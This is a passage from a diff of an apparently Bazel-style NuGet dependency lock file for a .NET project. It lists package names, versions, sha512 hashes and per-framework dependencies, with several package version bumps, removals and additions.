"Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", 
"System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", 
"System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeCoverage", "id": "Microsoft.CodeCoverage", "version": "17.12.0", "sha512": 
"sha512-POBqg788rrLApvncy8rvtyJ3ynsBdU0/SGUXD+vPqyRDM/aUJbPZWx01qalGJRK1GcArSku8QDd9AVMa0TkCkA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "7.0.13", "sha512": "sha512-N66kAzKBfcs4zIX/iVMUOhfn8Xv3Ye1QpLGS8IUSpCHa+Vxh2ZsdDiqd0Y2m7ryPU6FU2LOTnZ+0ymmm83vC6w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.8.3", "sha512": 
"sha512-3N/Ika66JZeORrIZ68fap6M0LSQ9+SQz277NxjA/dxETnR3dZwJXj67jAAc4FkijG6w//QzrC5NEregtIVjz1w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.0", "sha512": "sha512-dY64S9XmssfAjwvuGMHleFj2cKIhIFUU2D+Kr1D1Y+92mAPN/39HQMJay2FHxSRcDEI9hATivRV/I1N7QxVJcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], 
"netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.12.6", "sha512": "sha512-uCT/G0W1wUteqfrriWHfLfFmArka8ISo6nUkC5gQzYZYm2PSTuqfS14DEsY0gqDuQpcLLLaYTDcEM0SA2Za5vA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", 
"System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.Test.Sdk", "id": "Microsoft.NET.Test.Sdk", "version": "17.12.0", "sha512": "sha512-hGf8I8+yo15etavoMd+7OXcOG6/G7HYPDEJg5aQnhMzsxaUpq+udNZzSxmEN9rGTWMZOAVFcyNXNL7YBsN6chw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": ["Microsoft.CodeCoverage"], "net47": ["Microsoft.CodeCoverage"], "net471": ["Microsoft.CodeCoverage"], "net472": ["Microsoft.CodeCoverage"], "net48": ["Microsoft.CodeCoverage"], "net5.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net6.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net7.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net8.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net9.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "1.1.1", "sha512": "sha512-mDUJD1eLXIzmUnWCzWlmNQZGDp/cVGT8KyhzMcJNk2nlfdFUOoZai9idT8/FacJr8Nv8zhAmdf39FHm5qWUoGQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], 
"net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "1.1.3", "sha512": "sha512-pxwq8g2PYRiEF5KXVjmZFMNTqsg2Gr1puv/pR1sqAduAKHAGbaCuJ6+yc3pAJseClQUD29S2Ubrm7n/ZD78dUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.ObjectModel", "id": "Microsoft.TestPlatform.ObjectModel", "version": "17.12.0", "sha512": "sha512-klsXMgAPNWYo3ceakLkod4wYrk4lAV2Ehi676zUKgiVpQ5Yj6q3vsMhk/3pm97Ltk/hdcSW0rJKJvcQvTzPgYA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Reflection.Metadata"], "net462": 
["System.Reflection.Metadata"], "net47": ["System.Reflection.Metadata"], "net471": ["System.Reflection.Metadata"], "net472": ["System.Reflection.Metadata"], "net48": ["System.Reflection.Metadata"], "net5.0": ["System.Reflection.Metadata"], "net6.0": ["System.Reflection.Metadata"], "net7.0": ["System.Reflection.Metadata"], "net8.0": ["System.Reflection.Metadata"], "net9.0": ["System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Reflection.Metadata"], "netcoreapp2.1": ["System.Reflection.Metadata"], "netcoreapp2.2": ["System.Reflection.Metadata"], "netcoreapp3.0": ["System.Reflection.Metadata"], "netcoreapp3.1": ["System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Reflection.Metadata"], "netstandard2.1": ["System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.TestHost", "id": "Microsoft.TestPlatform.TestHost", "version": "17.12.0", "sha512": "sha512-gYM2BOGQvFEP2fZt61f3f5Gu+imL1G1bvGUrbJjpYcl66R6uzs5yESg0XMn8IgUgldz8RldOOaYmjk2KcSeG1Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net6.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net7.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net8.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net9.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], 
"netcoreapp3.1": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Win32.Primitives", "id": "Microsoft.Win32.Primitives", "version": "4.3.0", "sha512": "sha512-Nm8Hp51y9tYcK3xD6qk43Wjftrg1mdH24CCJsTb6gr7HS21U1uA+CKPGEtUcVZbjU1y8Kynzm5eoJ7Pnx5gm8A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], 
"netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Win32.SystemEvents", "id": "Microsoft.Win32.SystemEvents", "version": "7.0.0", "sha512": "sha512-GO6SWx/wSZIFvxOn67Y6OiIGdz9JGCg5CRDDbSAAvBDQeZFbybu9sEOUb9w/vUlQv+A2XakTFZg9Ug1w+tgbWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Mono.Posix.NETStandard", "id": "Mono.Posix.NETStandard", "version": "1.0.0", "sha512": "sha512-RtGiutQZJAmajvQ0QvBvh73VJye85iW9f9tjZlzF88idLxNMo4lAktP/4Y9ilCpais0LDO0tpoICt9Hdv6wooA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], 
"net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.235", "sha512": "sha512-9ige0SOByBirmeIYZ3fwlwbnXrYZA2trdZV7Mad8z7FiuGbVNOVkGYrzln/+G1eIvmRh9J0pt6xBLwqIYaMxyQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", 
"Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.243", "sha512": "sha512-Egw6dLclkDtfoVK+ncghRfYDEWiHjjmhbJFdqeZfqL/Ddtg+JoHzSMblBBTrn317coXZ7WMDELW3C9ZCpn0ByQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], 
"netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Newtonsoft.Json", "id": "Newtonsoft.Json", "version": "13.0.3", "sha512": "sha512-mbJSvHfRxfX3tR/U6n1WU+mWHXswYc+SB/hkOpx8yZZe68hNZGfymJu0cjsaJEkVzCMqePiU6LdIyogqfIn7kg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": 
"sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Buffers", "id": "System.Buffers", "version": "4.6.0", "sha512": "sha512-iRbJyTSX9bJVpURLGLiW8Fgk5Vfm5iGCztw4IG4IJYcxJy+BXTCEgEWFeJtO6c+kPnUmQu87KK5m188+qbErcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], 
